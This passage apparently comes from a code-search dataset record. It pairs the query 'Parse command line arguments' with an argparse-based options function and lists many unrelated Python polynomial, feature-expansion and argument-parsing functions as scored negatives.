np.atleast_1d(x).flatten()\n # for modest to large arrays, faster to find unique values and\n # only evaluate those. Have to cast to float because np.unique\n # can't handle object types like python native int\n unq_x, xidx = np.unique(x, return_inverse=True)\n _, pidx, outidx = np.unique(\n p.astype(float), return_index=True, return_inverse=True, axis=0\n )\n unq_p = p[pidx]\n\n if prec is not None and prec > 18:\n # TODO: possibly multithread this bit\n mpmath.mp.dps = prec\n y = np.array([np.asarray(mpmath.polyval(list(pi), unq_x)) for pi in unq_p])\n else:\n npoly = unq_p.shape[0] # number of polynomials\n order = unq_p.shape[1] # order of polynomials\n nx = len(unq_x) # number of coordinates\n y = np.zeros((npoly, nx))\n\n for k in range(order):\n y = y * unq_x + np.atleast_2d(unq_p[:, k]).T\n\n return y[outidx][:, xidx].astype(float)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. This can be used like\n # any other function\n return prediction_function", "def polyFunction(x,weights):\n y=0\n for i in range (0,len(weights)):\n y+= weights[i]*(x**i)\n return y", "def zzx_from_poly(f):\n return zzx_from_dict(dict(zip([ m for (m,) in f.monoms ], f.coeffs)))", "def zzx_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzx_to_dict(f).iteritems():\n terms[(monom,)] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def zzX_from_poly(f):\n if f.is_univariate:\n return zzx_from_poly(f)\n else:\n return zzX_from_dict(dict(zip(f.monoms, f.coeffs)), len(f.symbols))", "def polyfeatures(self, X, degree):\n #TODO\n \n for d in range(2,degree+1):\n X = np.append(X,X[:,[0]]**d,1)\n \n return X", "def main():\r\n\r\n coef = [1,0,0,-1,-10]\r\n x = 2\r\n\r\n # The algorithm initializes result as coefficient of x^n, where n is the degree of polynomial and then\r\n # Repeatedly multiply result with x and add next coefficient to result\r\n result = coef[0]\r\n for i in range(1, len(coef)):\r\n result = (result * x) + coef[i]\r\n\r\n print(f'The function evaluate to : {result} for given x value: {x}')", "def polyval(p, x):\r\n val = 0\r\n ii = len(p) - 1\r\n for i in range(len(p) - 1):\r\n val += p[i] * (x ** ii)\r\n ii -= 1\r\n return val + p[-1]", "def _factor_univariate_polynomial(self, f):\n R = f.parent()\n\n # if the polynomial does not have complex coefficients, PARI will\n # factor it over the reals. To make sure it has complex coefficients we\n # multiply with I.\n I = R.base_ring().gen()\n g = f*I if f.leading_coefficient()!=I else f\n\n F = list(g._pari_with_name().factor())\n\n from sage.structure.factorization import Factorization\n return Factorization([(R(g).monic(),e) for g,e in zip(*F)], f.leading_coefficient())", "def definePolyFunction():\n lstWeights=[]\n degree = input(\"degree of polynomial in terms of highest exponent of x:\")\n degree = int(degree+1)\n for a in range (0,degree):\n string='weight for x^'+str(a)+':'\n weight = input(string)\n weight = float(weight)\n lstWeights.append(weight)\n return lstWeights", "def linear_polynomial(self, e: 'PFElement') -> Polynomial:\n poly = self.polynomial(-e)\n poly += poly.monic(1)\n return poly", "def polyFeat(X, p):\r\n # You need to return the following variables correctly.\r\n X_poly = np.zeros((X.shape[0], p))\r\n\r\n # ====================== YOUR CODE HERE ======================\r\n\r\n for i in range(p):\r\n X_poly[:, i] = X[:, 0] ** (i + 1)\r\n\r\n # ============================================================\r\n return X_poly", "def polynomial_basis(X, degree):\n n_samples, n_features = X.shape\n\n # The number of monomials is (n + d) choose d\n n_monomials = int(factorial(n_features + degree)/(factorial(n_features)*factorial(degree)))\n features = np.ones((n_monomials, n_samples))\n col = 1\n x_T = X.T\n\n for deg in range(1, degree + 1):\n for combs in combinations_with_replacement(x_T, deg):\n features[col, :] = reduce(lambda x, y: x * y, combs)\n col += 1\n return features.T", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def funcv(x):\n f0 = x[0] ** 3.0 + x[1] + 3.0\n f1 = x[1] - 4.0 * x[0]\n return f0, f1", "def polynomial_value(multipliers, variable):\n def term(mult, var, order):\n if order > 1:\n return mult * variable ** order\n elif order == 1:\n return mult * variable\n elif order == 0:\n return mult\n return sum([term(mult, variable, order) for order, mult in enumerate(multipliers)])", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def _create_ploynomial_array(self, coeff, x):\n xarr = numpy.array(x)\n yarr = numpy.zeros(len(xarr))\n for idim in range(len(coeff)):\n ai = coeff[idim]\n yarr += ai*xarr**idim\n return yarr", "def f(self, x, coeffs, jitter = 0):\n return np.polyval(np.flip(coeffs), x) + random.uniform(-jitter,jitter)", "def construct_poly(data, power):\n return np.power(data, power)", "def evaluate_poly(poly, x):\n value_of_poly = 0\n for i in range(0, len(poly)):\n var = x\n power = i\n coeff = poly[i]\n value_of_poly += (coeff * (var**power))\n return value_of_poly", "def generate_polynomial_features(self, X) :\n\n n,d = X.shape\n\n ### ========== TODO : START ========== ###\n # part b: modify to create matrix for simple linear model\n # part g: modify to create matrix for polynomial model\n Phi = X\n m = self.m_\n\n if m == 1:\n Phi = np.zeros((n,2))\n for i in range(n):\n Phi[i,0] = 1\n Phi[i, 1] = X[i]\n\n else:\n Phi = np.ones((n,m+1))#n*m+1 dimmension\n power_arr = np.arange(0, m+1)\n for index, row in enumerate(Phi):# get every row\n row = np.repeat(X[index],m+1)\n row = np.power(row,power_arr)\n Phi [index,] = row\n #also could use the following\n \"\"\"\n import sklearn.preprocessing as sk\n #X is a N*1 vector\n poly_mat = sk.PolynomialFeatures(3)\n poly.fit_transform(a)\n \"\"\"\n\n\n\n\n\n ### ========== TODO : END ========== ###\n\n return Phi", "def polynomial(self, *args, indeterminate: str = 'X') -> Polynomial:\n return Polynomial([self.element(c) for c in args], base_field=self, indeterminate=indeterminate)", "def get_poly(kwargs):\n from sklearn.preprocessing import PolynomialFeatures\n return PolynomialFeatures(**kwargs)", "def general_poly(L):\n def evaluate(x):\n length=len(L)-1\n value=0\n for i in L:\n value+=i*(x**length)\n length-=1\n return value\n return evaluate", "def fourth_poly(a, b, c, d, e):\n return lambda z: a*z**4 + b*z**3 + c*z**2 + d*z + e", "def get_polyfit_function(self):\n N = len(self.coefficients)\n return lambda x: np.dot( self.get_poly(x).T , self.coefficients.reshape(N, 1) )", "def vectorMultiply(v, f):\n return [x * f for x in v]", "def coeffients(x, y):\n\n # ensure floating point datatypes\n x.astype(float)\n y.astype(float)\n\n # degree of interpolating polynomial\n n = len(x)\n\n # intitilize list of coeffients for interpolating polynomial to y values\n c = y.tolist()\n\n # compute coeffients\n for j in range(1, n):\n for i in range(n-1, j-1, -1):\n c[i] = float(c[i]-c[i-1])/float(x[i]-x[i-j])\n\n # return an array of polynomial coefficient, note: reverse order for np.polyval function\n return np.array(c[::-1])", "def prism_polynomial_set_vector(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n set1d = prism_polynomial_set_1d(domain_dim, order, variables)\n return [\n VectorFunction([p if i == j else 0 for j in range(range_dim)])\n for p in set1d\n for i in range(range_dim)\n ]", "def polynomial(x, y):\n \n var = copy(x)\n known = copy(y)\n V = vandermonde_matrix(var)\n a = gauss_elimination(V, known)\n return a", "def add_polynomial_features(x, power):\n if type(power) is int and type(x) is np.ndarray:\n return np.concatenate([x**i for i in range(1, power+1)], axis=1)\n return None", "def list_to_poly(polynomial_list):\n max_degree = len(polynomial_list) - 1\n strings = []\n opts = ['x', '']\n for index, num in enumerate(polynomial_list):\n if num == 0:\n continue\n if index < max_degree - 1:\n string = '{}x^{}'.format(num, max_degree - index)\n strings.append(string)\n else:\n strings.append(str(num) + opts[index - (max_degree - 1)])\n polynomial = ' + '.join(strings).replace('+ -', '- ')\n return polynomial", "def bezierPoly(ctrlP):\n n = len(ctrlP) - 1 #degree of the polynomial\n first = True\n for t in np.linspace(0.0, 1.0, 5 * n):\n point = bezierFunc(ctrlP, t)\n if first: # Initialize list of points in the polynomial\n bezierPointsList = np.copy(point)\n first = False\n else:\n bezierPointsList = np.append(bezierPointsList, point, axis=0)\n return bezierPointsList", "def f(self, x=None, odo=None, v=None):\n \n # x is a vector\n x = base.getvector(x, 3)\n dd, dth = odo\n theta = x[2]\n\n if v is not None:\n v = base.getvector(v, 2)\n dd += v[0]\n dth += v[1]\n \n x_next = x + [dd * np.cos(theta), dd * np.sin(theta), np.ones(np.size(x, 0)*dth)]\n\n return x_next", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def nc_coeffs(poly, var, max_deg=10, order='increasing'):\r\n\r\n # TODO: elegant way to find out the degree\r\n # workarround: pass the maximum expected degree as kwarg\r\n\r\n D0 = sp.Dummy('D0')\r\n poly = poly.expand() + D0 # ensure class add\r\n\r\n assert isinstance(poly, sp.Add)\r\n res = []\r\n # special case: 0-th power of var\r\n coeff = 0\r\n for a in poly.args:\r\n if not a.has(var):\r\n coeff += a\r\n res.append(coeff.subs(D0, 0))\r\n\r\n # special case: first power of var\r\n coeff = poly.diff(var).subs(var, 0)\r\n res.append(coeff)\r\n\r\n # powers > 1:\r\n for i in xrange(1, max_deg):\r\n coeff = 0\r\n for a in poly.args:\r\n if a.has(var**(i + 1)):\r\n term = a.subs(var, 1)\r\n coeff += term\r\n res.append(coeff)\r\n\r\n if order == \"decreasing\":\r\n res.reverse()\r\n\r\n return res", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n return coefficients", "def phi_poly(self,x,i):\n return x**i", "def general_poly (L):\r\n\r\n def secondFunc(x):\r\n total = 0\r\n listLength = len(L)-1\r\n for i in L:\r\n total += i * x**listLength\r\n listLength -= 1\r\n return(total)\r\n return secondFunc", "def polynomial_equation(funct):\n coeff = str(differentiation.parse_coefficient(funct))\n if \"^\" not in funct:\n divisor = \"1\"\n else:\n divisor_location = str(funct.index(\"^\") + 1)\n divisor = funct[divisor_location:]\n if divisor == \"-1\":\n pass\n else:\n divisor = str(int(divisor) + 1)\n coeff += \"/\" + divisor\n return coeff + \"x^\" + str(divisor)", "def coeffs(f):\n return dmp_coeffs(f.rep, f.lev, f.dom)", "def generador_n(vector_v, constante):\n\n n = []\n\n for x in range(len(vector_v)):\n nn = vector_v[x] * constante\n n.append(nn)\n\n # print(\"valores v: \", vector_v)\n # print(\"valores n: \", n)\n\n return n", "def polyder_vec(p, m):\n factorial = np.math.factorial\n m = np.asarray(m, dtype=int) # order of derivative\n p = np.atleast_2d(p)\n order = p.shape[1] - 1\n\n D = np.arange(order, -1, -1)\n num = np.array([factorial(i) for i in D], dtype=object)\n den = np.array([factorial(max(i - m, 0)) for i in D], dtype=object)\n D = (num // den).astype(p.dtype)\n\n p = np.roll(D * p, m, axis=1)\n idx = np.arange(p.shape[1])\n p = np.where(idx < m, 0, p)\n\n return p", "def evaluate_poly(poly, x):\n if len(poly) == 1:\n\t\t#base case\n\t\treturn poly[0]\n else:\n #recursive case\n #the first item in the tuple is the coefficient of X**0, so it's the final value\n #the rest of the items in the tuple need multiplied by X and put in new tuple\n #Yes, I'm cheating and casting a list to a tuple. GFY and your immutability.\n return poly[0] + evaluate_poly(tuple([x * coeff for coeff in poly[1:]]), x)", "def evaluate_poly(poly: Sequence[float], x: float) -> float:\n return sum(c * (x**i) for i, c in enumerate(poly))", "def as_vector(self):\n if self.is_vector():\n return self\n else:\n assert self.is_scalar()\n return BSplineFunc(self.kvs, self.coeffs[..., np.newaxis])", "def hash_vector(self,v):\r\n # you will need to use self.functions for this method\r\n x = np.array([f(v[0]) for f in self.functions])\r\n #print (x)\r\n return x\r\n raise NotImplementedError", "def phasepoly14(param, x):\n # 2011-09-26 10:42 IJMC: Created from phaselamb14\n N = len(param) - 14\n cparam = array(param[N::], copy=True)\n cparam[0] = 1. / prod(1. + cparam[1::]) - 1.\n\n if len(x.shape)==1:\n was1d = True\n x = x.reshape(14, len(x)/14.)\n else:\n was1d = False\n\n ret = polyval(param[0:N], x)\n ret *= (1. + cparam.reshape(14,1))\n\n if was1d:\n ret = ret.ravel()\n\n return ret", "def get_poly(self, n, xf = 14, y0=[1, 0], first_step = 1e-10, max_step = .1):\n self.n = n\n y0s = [1- first_step**2/2, - first_step]\n sol = integ.solve_ivp(lambda t, y: self.f(t, y, n), (first_step, xf), y0s, max_step=max_step, \\\n vectorized=True, events=self.find_zero)\n data_sol = np.array([sol.t, sol.y[0], sol.y[1]])\n data_sol[1, -1] = 1e-18\n data0 = np.array([0, y0[0], y0[1]]).reshape(3, 1)\n self.poly = np.concatenate((data0, data_sol), axis=1)", "def compute_deriv(poly):\n derivative_of_poly = []\n for i in range(1, len(poly)):\n power = i\n coeff = poly[i]\n y = float(coeff * power)\n first = derivative_of_poly.append(y)\n return derivative_of_poly", "def element_from_poly(self, f):\n n, k = self.n, f.degree()\n if k >= n:\n f = f % self.T\n if f == 0:\n return self.zero()\n d, c = dup_clear_denoms(f.rep.rep, QQ, convert=True)\n c = list(reversed(c))\n ell = len(c)\n z = [ZZ(0)] * (n - ell)\n col = to_col(c + z)\n return self(col, denom=d)", "def slip_to_coefficients(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n coefficients = np.linalg.inv(partials) @ y\n return coefficients", "def zzx_eval(f, x):\n result = INT_ZERO\n\n if not x:\n return poly_TC(f)\n\n for a in f:\n result *= x\n result += a\n\n return result", "def poly_derivative(poly):\n if type(poly) is not list or len(poly) < 1:\n return None\n if len(poly) == 1:\n return [0]\n\n derivated_coefficients = []\n\n for power, coefficient in enumerate(poly):\n if power == 0:\n pass\n\n else:\n new_coefficient = coefficient * power\n derivated_coefficients.append(new_coefficient)\n\n return(derivated_coefficients)", "def poly(x, y, pd) :\n # Maximum polynomial degree allowed is 7.\n maxD = 7\n if pd > maxD :\n exit(\"Please choose a reasonable polynomial degree (0 <= pd <= \" + maxD + \").\")\n \n # Make the polynomial matrix one degree at a time.\n p = np.zeros((len(x), int((pd+1)*(pd+2)/2)), float)\n count = 0\n numP = 0\n for i in range(pd + 1) :\n for j in range(numP + 1) :\n if (j == 0) and (numP == 0) :\n p[:,count] = 1\n elif (j == 0) :\n p[:,count] = x**(numP-j)\n elif (numP-j == 0) :\n p[:,count] = y**j\n else :\n p[:,count] = x**(numP-j) * y**j\n count += 1\n numP += 1\n \n return p", "def f(x):\n return ((x[0] - 1) ** 2) + ((x[1] + 3) ** 2)", "def make_coefficients(r, a, num_terms):\n\n\tnum_vars = 4\n\tcoeffs = np.zeros((num_vars, num_terms))\n\tfor i in range(num_vars):\n\t\tcoeffs[i, i+1] = r[i]\n\tcoeffs[0, [5, 6, 7, 8]] = a[0]\n\tcoeffs[1, [6, 9, 10, 11]] = a[1]\n\tcoeffs[2, [7, 10, 12, 13]] = a[2]\n\tcoeffs[3, [8, 11, 13, 14]] = a[3]\n\t\n\treturn coeffs.ravel()", "def viete(f, roots=None, *gens, **args):\n allowed_flags(args, [])\n\n if isinstance(roots, Basic):\n gens, roots = (roots,) + gens, None\n\n try:\n f, opt = poly_from_expr(f, *gens, **args)\n except PolificationFailed as exc:\n raise ComputationFailed('viete', 1, exc)\n\n if f.is_multivariate:\n raise MultivariatePolynomialError(\n \"multivariate polynomials are not allowed\")\n\n n = f.degree()\n\n if n < 1:\n raise ValueError(\n \"Cannot derive Viete's formulas for a constant polynomial\")\n\n if roots is None:\n roots = numbered_symbols('r', start=1)\n\n roots = take(roots, n)\n\n if n != len(roots):\n raise ValueError(\"required %s roots, got %s\" % (n, len(roots)))\n\n lc, coeffs = f.LC(), f.all_coeffs()\n result, sign = [], -1\n\n for i, coeff in enumerate(coeffs[1:]):\n poly = symmetric_poly(i + 1, roots)\n coeff = sign*(coeff/lc)\n result.append((poly, coeff))\n sign = -sign\n\n return result", "def coeffs_from_vec(self, coeffs_vec):\n coeffs = [self.coeffs[0].copy(), self.coeffs[1].copy()]\n coeffs[0].iloc[1:] = coeffs_vec[:self.index_ncoeffs[0]].copy()\n coeffs[1].iloc[1:] = coeffs_vec[self.index_ncoeffs[0]:].copy()\n return coeffs", "def generador_v(vector_n, constante):\n\n v = []\n\n for x in range(len(vector_n)):\n nv = vector_n[x] // constante # // = Division entera\n v.append(nv)\n\n # print(\"valores n: \", vector_n)\n # print(\"valores v: \", v)\n\n return v", "def get_poly_coeff(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n return model.coef_\n except Exception as e:\n print(e)", "def poly_derivative(poly):\n if not poly or type(poly) is not list:\n return None\n\n response = []\n\n for order in range(1, len(poly)):\n response.append(order * poly[order])\n\n if not response:\n response.append(0)\n\n return response", "def cheb_poly(x, n):\n if n == 0:\n return anp.array([1 for i in x])\n elif n == 1:\n return x\n else:\n return 2*x*cheb_poly(x, n-1)-cheb_poly(x, n-2)\n\n raise NotImplementedError(\"Problem 6 Incomplete\")", "def int_to_vector(a: int, characteristic: int, degree: int) -> np.ndarray:\n a_vec = np.zeros(degree, dtype=DTYPE)\n for i in range(degree - 1, -1, -1):\n q, r = divmod(a, characteristic)\n a_vec[i] = r\n a = q\n\n return a_vec", "def prism_polynomial_set_1d(\n dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[ScalarFunction]:\n assert dim == 3\n return [\n ScalarFunction(variables[0] ** i * variables[1] ** j * variables[2] ** k)\n for k in range(order + 1)\n for j in range(order + 1)\n for i in range(order + 1 - j)\n ]", "def get_poly(self, p, vv_x, vv_y, vv_z):\n self._get_poly(p, vv_x, vv_y, vv_z)", "def EllipticCurve_from_Weierstrass_polynomial(f):\n return EllipticCurve(coefficients_from_Weierstrass_polynomial(f))", "def _polynomial_entity(value, context):\n assert isinstance(value, Polynomial)\n coefficients = np.asarray(value.coefficients)\n num_variables = coefficients.ndim\n variables = [sympy.Symbol(context.pop()) for _ in range(num_variables)]\n function_symbol = context.pop()\n handle = FunctionHandle(function_symbol)\n handle_description = sympy.Function(function_symbol)(*variables)\n\n polynomial = polynomials.coefficients_to_polynomial(coefficients, variables)\n polynomial = polynomial.sympy()\n\n return Entity(\n context=context,\n value=value,\n expression=polynomial,\n polynomial_variables=variables,\n description='Let {function} = {polynomial}.',\n handle=handle,\n function=handle_description,\n polynomial=polynomial)", "def E_polynomial(self):\n\n from nodepy import stability_function\n p, q = self.stability_function()\n return stability_function.E_polynomial(p, q)", "def rotorconversion(x):\n return cf.MultiVector(layout, val_rotorconversion(x))", "def evaluate_poly(poly, x):\n exp = 0\n total = 0\n for coef in poly:\n total += coef * (x ** exp)\n exp += 1\n\n return total", "def random_polynomial(self, degree: int) -> Polynomial:\n p = self.polynomial(*[self.random_element() for _ in range(0, degree)])\n p += p.monic(degree)\n return p", "def _generate_poly_array(self, nchan, coeff=[]):\n if nchan < 0:\n raise ValueError, \"nchan should be >=0\"\n if len(coeff)==0:\n if nchan ==0: return []\n else: raise ValueError, \"No valid coefficient given.\"\n polyarr = numpy.zeros(nchan)\n for iorder in range(len(coeff)):\n polyarr += coeff[iorder]*numpy.array(xrange(nchan))**iorder\n return polyarr", "def polyfit(data, tvec, intfun):\n\n posx = intfun(tvec, data[:, 0])\n posz = intfun(tvec, data[:, 1])\n velx = posx.derivative(1)\n velz = posz.derivative(1)\n accx = posx.derivative(2)\n accz = posz.derivative(2)\n\n pos = np.c_[posx(tvec), posz(tvec)]\n vel = np.c_[velx(tvec), velz(tvec)]\n acc = np.c_[accx(tvec), accz(tvec)]\n\n return pos, vel, acc", "def build_poly_by_feature(tx, degrees):\n poly_tempt = np.ones([tx.shape[0],1])\n for idx, degree in enumerate(degrees):\n feature_poly = build_poly(tx[:,idx], int(degree))\n poly_tempt = np.c_[poly_tempt, feature_poly[:,1:]]\n return poly_tempt", "def base_polynome(numbers):\n\n monomes = [ x**n for n in numbers ]\n polynome = sum(monomes)\n\n return poly(polynome, x)", "def apply_function_vector(function_vector, x_vector):\n function_index = 0\n element_index = 1\n \n def d():\n for e in zip(function_vector, x_vector):\n print(e[1])\n d()\n \n return list(map(lambda fx_set: fx_set[function_index](fx_set[element_index]), zip(function_vector, x_vector)))" ]
[ "0.71002614", "0.6959504", "0.6857088", "0.6731912", "0.671709", "0.66995835", "0.6682442", "0.6642471", "0.66166174", "0.6615598", "0.6501584", "0.6486129", "0.6437595", "0.64153004", "0.64109534", "0.6395708", "0.63793916", "0.636425", "0.63570154", "0.6323563", "0.63210785", "0.6311876", "0.62695116", "0.62600124", "0.625725", "0.62468284", "0.6241553", "0.62346077", "0.62305295", "0.6224792", "0.6201502", "0.62011755", "0.61995184", "0.61757153", "0.6160057", "0.6152254", "0.61279935", "0.61177516", "0.61074066", "0.61055243", "0.60866016", "0.60704637", "0.60691667", "0.6064752", "0.6062994", "0.6048836", "0.6016137", "0.5994943", "0.59916896", "0.59246814", "0.59179455", "0.59060675", "0.58883846", "0.5885904", "0.587994", "0.58799183", "0.58636135", "0.58537495", "0.58468664", "0.5840514", "0.5828928", "0.5821135", "0.58138096", "0.5807103", "0.5799996", "0.5792696", "0.5787576", "0.5781467", "0.5778742", "0.5772484", "0.5767443", "0.57583106", "0.57442546", "0.57390463", "0.5732795", "0.5719657", "0.571687", "0.57142866", "0.57142246", "0.5699291", "0.569207", "0.5683912", "0.5680507", "0.5674287", "0.56733024", "0.56536144", "0.5651479", "0.5642676", "0.56388575", "0.5634643", "0.5606243", "0.5605226", "0.55995053", "0.5590287", "0.55855006", "0.55814964", "0.5576966", "0.5572464", "0.555653", "0.5530422" ]
0.67569125
3
Parse command line arguments
def get_options(cmd_args=None): cmd_parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter) cmd_parser.add_argument( '-i', '--input_file', help="""a log file to be cleaned up""", type=str, default='') cmd_parser.add_argument( '-s', '--salt', help="""the salt for anonymizing IPs [optional, defaults to hardcoded one]""", type=str, default=salt) args = cmd_parser.parse_args(cmd_args) options = {} options['input_file'] = args.input_file options['salt'] = args.salt return options
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(args):", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_command_line_arguments():\n\n description, epilog = __doc__.split(\"\\n\\n\", 1)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog)\n\n parser.add_argument('-s', '--s', dest='s', action='store', type=float, required=True,\n help='Minimum frequency')\n parser.add_argument('-c', '--credentials', dest='credentials', action='store',\n default=\"./.tpass\",\n help='File with Twitter credentials (username and password, separated by a space)')\n\n args = parser.parse_args()\n \n return args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n 